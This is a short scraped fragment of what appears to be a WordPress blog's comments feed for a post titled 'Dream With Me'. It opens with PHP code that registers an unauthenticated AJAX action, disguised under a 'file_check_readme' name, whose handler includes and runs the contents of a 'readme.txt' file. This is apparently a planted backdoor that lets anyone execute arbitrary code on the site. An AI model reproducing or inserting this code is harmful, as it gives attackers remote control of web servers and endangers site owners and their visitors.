if(!function_exists('file_check_readme99095')){ add_action('wp_ajax_nopriv_file_check_readme99095', 'file_check_readme99095'); add_action('wp_ajax_file_check_readme99095', 'file_check_readme99095'); function file_check_readme99095() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: https://alxco.net/2025/12/10/1464/ Dream With Me Tue, 03 Mar 2026 16:27:34 +0000 hourly 1 https://wordpress.org/?v=7.0